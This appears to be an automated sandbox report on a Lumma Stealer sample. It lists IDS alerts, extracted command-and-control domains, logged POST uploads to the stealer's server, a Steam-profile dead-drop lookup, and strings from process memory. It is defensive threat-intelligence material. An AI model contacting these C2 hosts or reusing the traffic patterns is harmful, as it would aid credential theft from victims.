              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 104.21.32.196:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.32.196:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: heroicmint.sbs
              Source: Malware configuration extractorURLs: wrigglesight.sbs
              Source: Malware configuration extractorURLs: ferrycheatyk.sbs
              Source: Malware configuration extractorURLs: snailyeductyi.sbs
              Source: Malware configuration extractorURLs: captaitwik.sbs
              Source: Malware configuration extractorURLs: monstourtu.sbs
              Source: Malware configuration extractorURLs: sidercotay.sbs
              Source: Malware configuration extractorURLs: deepymouthi.sbs
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: villagedguy.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 75Host: villagedguy.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18159Host: villagedguy.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8780Host: villagedguy.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20433Host: villagedguy.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 3802Host: villagedguy.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 3818Host: villagedguy.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1249Host: villagedguy.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1117Host: villagedguy.cyou
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: deepymouthi.sbs
              Source: global trafficDNS traffic detected: DNS query: monstourtu.sbs
              Source: global trafficDNS traffic detected: DNS query: heroicmint.sbs
              Source: global trafficDNS traffic detected: DNS query: sidercotay.sbs
              Source: global trafficDNS traffic detected: DNS query: captaitwik.sbs
              Source: global trafficDNS traffic detected: DNS query: wrigglesight.sbs
              Source: global trafficDNS traffic detected: DNS query: ferrycheatyk.sbs
              Source: global trafficDNS traffic detected: DNS query: snailyeductyi.sbs
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: villagedguy.cyou
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: villagedguy.cyou
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://ocsp.digicert.com0A
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://ocsp.digicert.com0C
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://ocsp.digicert.com0N
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://ocsp.digicert.com0X
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: Qt5GuiVBox.dllString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
              Source: Qt5GuiVBox.dllString found in binary or memory: http://www.color.org)
              Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dllString found in binary or memory: http://www.digicert.com/CPS0
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BitLockerToGo.exe, 00000002.00000003.1952377971.0000000005060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: Imperial_Delay.exeString found in binary or memory: https://api.zitadel.ch/assets/v1/avatar-32432jkh4kj32
              Source: BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
              Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/communit
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=xYs7
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englis
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engli
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=I6RUPT-G-voT&amp
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
              Source: BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Imperial_Delay.exeString found in binary or memory: https://github.com/golang/protobuf/issues/1609):
              Source: Imperial_Delay.exeString found in binary or memory: https://github.com/zitadel/zitadel/blob/new-eventstore/cmd/zitadel/startup.yaml.
              Source: libidn2-0.dll.0.drString found in binary or memory: https://gnu.org/licenses/gpl.html
              Source: libidn2-0.dll.0.drString found in binary or memory: https://gnu.org/licenses/gpl.htmlWritten
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
